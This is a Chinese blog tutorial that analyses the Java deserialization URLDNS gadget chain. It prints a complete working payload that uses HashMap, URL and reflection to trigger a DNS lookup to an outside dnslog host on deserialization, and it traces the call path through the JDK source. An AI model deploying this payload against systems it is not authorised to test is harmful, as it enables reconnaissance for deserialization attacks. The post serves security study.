Java安全 反序列化(1) URLDNS链原理分析

已于 2024-03-22 16:06:43 修改
阅读量1.5k 收藏 16
点赞数 24
分类专栏: Web学习笔记 文章标签: java 安全 开发语言 网络安全 web安全 CTF Web
于 2024-03-15 19:40:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39947980/article/details/136748305
版权

Java安全 反序列化(1) URLDNS链原理分析

文章目录


开始学习Java反序列化链–URLDNS

前置知识

请提前了解Java序列化和反序列化,熟悉Java反射机制

应用

1.判断是否存在反序列化的点

2.判断目标是否出网

先上payload 后进行分析

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;
public class DnsTest {
    public static void main(String[] args) throws Exception {
        HashMap hashmap =new HashMap();
        URL url = new URL("http://wxzzwpgygc.dgrh3.cn");
        Class c = url.getClass();
        Field fieldhashcode=c.getDeclaredField("hashCode");
        fieldhashcode.setAccessible(true);
        fieldhashcode.set(url,222); //第一次查询的时候会进行缓存,所以让它不等于-1
        hashmap.put(url,2);
        fieldhashcode.set(url,-1); //让它等于-1 就是在反序列化的时候等于-1 执行dns查询
        serialize(hashmap);
        unserialize();
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new
                FileOutputStream("ser.bin"));
        oos.writeObject(obj);
        oos.close();
    }
    public static void unserialize() throws IOException, ClassNotFoundException
    {
        ObjectInputStream ois = new ObjectInputStream(new
                FileInputStream("ser.bin"));
        ois.readObject();
        ois.close();
    }
}

image-20240315190036643

可以触发dns请求

分析payload

1.新建HashMap类

 HashMap hashmap =new HashMap();

什么是HashMap:

基于哈希表的实现的Map接口
在这里插入图片描述

HashMap是什么?

是键值对映射关系的集合,可以包含多对键值对
键是唯一的,值可以相同
HashMap<key的类型,value的类型> map =new HashMap<>();
map.put(key,value)存放了这对键值对
扩展HashMap中的Entry是什么
可以理解为HashMap的单体,包含一对键值对

为什么选择HashMap作为入口类?

1.因为入口重写了readobject方法
2.实现了反序列化接口
在这里插入图片描述

2.新建URL类

 URL url = new URL("http://wxzzwpgygc.dgrh3.cn");

3.获取URL 的 Class对象

 Class c = url.getClass();

用于操作反射

4.通过反射访问URL内部变量

 Field fieldhashcode=c.getDeclaredField("hashCode");
        fieldhashcode.setAccessible(true);

5.通过反射为URL中类赋值

 fieldhashcode.set(url,222); //第一次查询的时候会进行缓存,所以让它不等于-1

6.调用HashMap#put方法传入key和value

hashmap.put(url,2);

hashmap.put(key,value)

key 为前面新建的url类

value 为任意值

7.再次通过反射为URL类的hashcode赋值

fieldhashcode.set(url,-1); //让它等于-1 就是在反序列化的时候等于-1 执行dns查询

赋值URL类中的hashcode为-1

触发dns请求,完成访问

原理分析

1.进行序列化

 public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new
                FileOutputStream("ser.bin"));
        oos.writeObject(obj);
        oos.close();
    }
 serialize(hashmap); //传入的obj为hashmap

image-20240315190440069

那么反序列化会自动触发HashMap的readobject方法

我们可以调试分析一下

Ctrl-B跟进实现原理

2.跟进HashMap的readobject方法

image-20240315191405977

在方法的最后调用了hash方法

image-20240315192007607

3.跟进hash方法

image-20240315192116541

进行判断只要key不为空

就 调用 key的hashCode()方法

我们传入的key是URL类的对象

所以调用的是URL#hashCode方法

4.可以跟进URL的hashCode方法

image-20240315192342511

只有hashCode为-1 时

会进入hashCode = handler.hashCode(this); this为当前对象的引用

5.跟进handler.hashCode方法

image-20240315192658793

我们在新建URL类时 传入了我们的dnslog地址

getHostAddress进行DNS解析,完成请求

细节问题

为什吗要给URL类hashCode赋值两次?

 fieldhashcode.set(url,222); //第一次查询的时候会进行缓存,所以让它不等于-1
        hashmap.put(url,2);
        fieldhashcode.set(url,-1); //让它等于-1 就是在反序列化的时候等于-1 执行dns查询

第一次查询的时候会进行缓存触发dns请求,将URL.hashCode设置为-1,hashmap.put时也触发dns请求,我们可以做个实验

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;
public class DnsTest {
    public static void main(String[] args) throws Exception {
        HashMap hashmap =new HashMap();
        URL url = new URL("http://rcjynkewns.dgrh3.cn");
//        Class c = url.getClass();
//        Field fieldhashcode=c.getDeclaredField("hashCode");
//        fieldhashcode.setAccessible(true);
//        fieldhashcode.set(url,222); //第一次查询的时候会进行缓存,所以让它不等于-1
        hashmap.put(url,2);
//        fieldhashcode.set(url,-1); //让它等于-1 就是在反序列化的时候等于-1 执行dns查询
//        serialize(hashmap);
//        unserialize();
    }
//    public static void serialize(Object obj) throws IOException {
//        ObjectOutputStream oos = new ObjectOutputStream(new
//                FileOutputStream("ser.bin"));
//        oos.writeObject(obj);
//        oos.close();
//    }
//    public static void unserialize() throws IOException, ClassNotFoundException
//    {
//        ObjectInputStream ois = new ObjectInputStream(new
//                FileInputStream("ser.bin"));
//        ois.readObject();
//        ois.close();
//    }
//}

只留下了hashmap的put方法

image-20240315193323871

image-20240315193452950

可以发现照样触发
put为什么了触发dns请求

因为HashMap.put方法同样进行了hash(key)的操作最终还是调用了对象的hashCode()方法,因此重复了操作

image-20240322160435862

为了避免误判

我们先将URL.hashCode属性赋值为 只要不是-1的值

hashmap.put()方法后 不会进行dns查询

再通过反射修改URL.hashCode属性为-1 完成dns请求

J1rrY_
关注
  • 24
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Java序列实战.pdf
08-08
本议题将从那些经典案例入手,分析攻击方和防御方的对抗过程。会从fastjson与weblogic的两个经典漏洞,带大家傲游序列的世界。 序列入门 Fastjson Weblogic 序列防御
java序列 URLDNS分析
m0_64815693的博客
04-14 672
java序列 URLDNS分析
JAVA序列序列的底层实现原理解析
08-25
主要介绍了JAVA序列序列的底层实现原理解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Java安全漫谈 - 07.序列篇(1)1
08-03
但首先要理解的是,“序列漏洞”是对一类漏洞的泛指,而不是专指某种序列方法导致的漏洞,比如Jackson序列漏洞和Java readObject造成的
深入分析Java序列序列
12-22
序列是一种对象持久的手段。普遍应用在网络传输、RMI等场景中。本文通过分析ArrayList的序列来介绍Java序列的相关内容。主要涉及到以下几个问题:   怎么实现Java序列   为什么实现了java.io.Serializable接口才能被序列   transient的作用是什么   怎么自定义序列策略   自定义的序列策略是如何被调用的   ArrayList对序列的实现有什么好处   Java对象的序列   Java平台允许我们在内存中创建可复用的Java对象,但一般情况下,只有当JVM处于运行时,这些对象才可能存在,即,这些对象的生命周期不会比
java序列序列详解
pyth0zn的博客
05-01 2514
serialVersionUID - 0x0e 76 fa 9f 59 73 be c6 是16进制转换为二进制,就是生成的值transient修饰的变量不能被序列;transient只作用于实现 Serializable 接口;transient只能用来修饰普通成员变量字段;不管有没有 transient 修饰,静态变量都不能被序列
Java 序列原理与基础,URLDNS攻击链分析
weixin_49248030的博客
11-03 638
序列是指将对象转为字节流,其目的是便于对象在内存、文件、数据库或者网络之间传递。序列则是序列的逆过程,即字节流转为对象的过程,通常是程序将内存、文件、数据库或者网络传递的字节流还原成对象。在 Java 原生的API 中,序列的过程由 ObjectOutputStream 类的 writeObject()方法实现,序列过程由 ObjectInputStream 类的 readObject()方法实现。
Java序列URLDNS
m0_62466350的博客
05-28 692
URLDNS链是java原生态的一条利用链,通常用于存在序列漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在序列漏洞URLDNS利用链,只能发起DNS请求,并不能进行其他利用这条链路还是比较简单的,通常用于存在序列漏洞进行验证的,学好了才能更好的为后面打基础。
java序列-URLDNS
GalaxySpaceX的博客
02-23 218
java序列-URLDNS分析
Java序列入门之URLDNS链1
08-03
1、 java.util.HashMap 重写了 readObject 方法: 2、 java.net.URL 对象的 hashCode 在计算时会调用 get
java序列URLDNS链学习
dayouzi的博客
04-25 679
1、Java 序列是指把 Java 对象转换为字节序列的过程。ObjectOutputStream类的 writeObject() 方法可以实现序列。2、Java 序列是指把字节序列恢复为 Java 对象的过程。ObjectInputStream 类的 readObject() 方法用于序列
Java序列之ysoserial URLDNS模块分析java迭代器实现原理
m0_64867092的博客
12-30 166
由于HashMap中重写了writeObject方法,因此在进行序列操作时,执行的序列方法是HashMap中的writeObject方法,具体如下: 先执行默认的序列操作: 接着 遍历HashMap,对HashMap中的key,value进行序列。 综上所述,梳理下ysoserial payload,URLDNS 序列的整个过程: 首先 ysoserial 通过射的方式,根据全限定类名 ysoserial.payloads.URLDNS ,获取对应的Class类对象,
java序列 cc链6 分析
m0_64815693的博客
04-22 1015
java序列 cc链6 分析
jdk8新特性----Lambda表达式
w_t_y_y的博客
05-11 440
Java的Lambda表达式是Java 8引入的一个特性,它支持函数式编程,允许将函数作为方法的参数或返回值,从而简了匿名内部类的使用,并提供了对并行编程的更好支持。
jar包增量更新分析
最新发布
junlaiyan的专栏
05-16 135
借助jdeps分析出jar包的增量文件
CMS垃圾回收器为什么被移除
m0_54187478的博客
05-10 519
由于上述缺点,加上需要将资源投入到更现代垃圾回收器的开发和优上,Oracle决定从Java 9开始标记CMS为废弃,并在后续版本中完全移除CMS。这些新的收集器旨在提供更低的停顿时间和更高的性能,同时减少配置和维护的复杂性。当它在垃圾收集周期内无法足够快地回收内存时,会退回到一种需要完全暂停所有应用线程的老年代收集模式,这与它设计的初衷相违背。:CMS使用的标记-清除算法会导致较多的内存碎片。:CMS需要更多的CPU资源来执行垃圾回收的并发阶段,而且它在运行时对系统资源的利用也较为激进。
java导出excel动态加载多sheet多复杂表头
weixin_43931108的博客
05-14 202
java导出excel动态加载多sheet多复杂表头
java序列利用链
04-29
Java序列利用链是指黑客利用Java序列漏洞,通过构造恶意的序列数据,将恶意代码注入目标系统,从而实现攻击的手段。Java序列漏洞可能带来很大的风险,因为黑客可以利用它来实现各种攻击,比如代码执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值